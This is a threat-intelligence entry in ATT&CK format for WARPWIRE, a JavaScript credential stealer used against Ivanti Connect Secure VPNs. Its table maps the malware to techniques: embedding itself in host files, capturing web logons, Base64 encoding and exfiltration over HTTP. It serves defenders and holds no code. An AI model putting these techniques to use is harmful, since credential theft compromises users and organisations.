S1116 WARPWIRE
WARPWIRE is a Javascript credential stealer that targets plaintext passwords and usernames for exfiltration that was used during Cutting Edge to target Ivanti Connect Secure VPNs.21
| Item | Value |
|---|---|
| ID | S1116 |
| Associated Names | |
| Type | MALWARE |
| Version | 1.1 |
| Created | 05 March 2024 |
| Last Modified | 15 April 2025 |
| Navigation Layer | View In ATT&CK® Navigator |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.007 | JavaScript | WARPWIRE is a credential harvester written in JavaScript.2 |
| enterprise | T1554 | Compromise Host Software Binary | WARPWIRE can embed itself into a legitimate file on compromised Ivanti Connect Secure VPNs.2 |
| enterprise | T1132 | Data Encoding | - |
| enterprise | T1132.001 | Standard Encoding | WARPWIRE can Base64 encode captured credentials with btoa() prior to sending to C2.2 |
| enterprise | T1048 | Exfiltration Over Alternative Protocol | - |
| enterprise | T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol | WARPWIRE can send captured credentials to C2 via HTTP GET or POST requests.21 |
| enterprise | T1056 | Input Capture | - |
| enterprise | T1056.003 | Web Portal Capture | WARPWIRE can capture credentials submitted during the web logon process in order to access layer seven applications such as RDP.2 |
References
-
Lin, M. et al. (2024, January 31). Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation. Retrieved February 27, 2024. ↩↩
-
McLellan, T. et al. (2024, January 12). Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation. Retrieved February 27, 2024. ↩↩↩↩↩↩
-
Gurkok, C. et al. (2024, January 15). Ivanti Connect Secure VPN Exploitation Goes Global. Retrieved February 27, 2024. ↩
-
Meltzer, M. et al. (2024, January 10). Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN. Retrieved February 27, 2024. ↩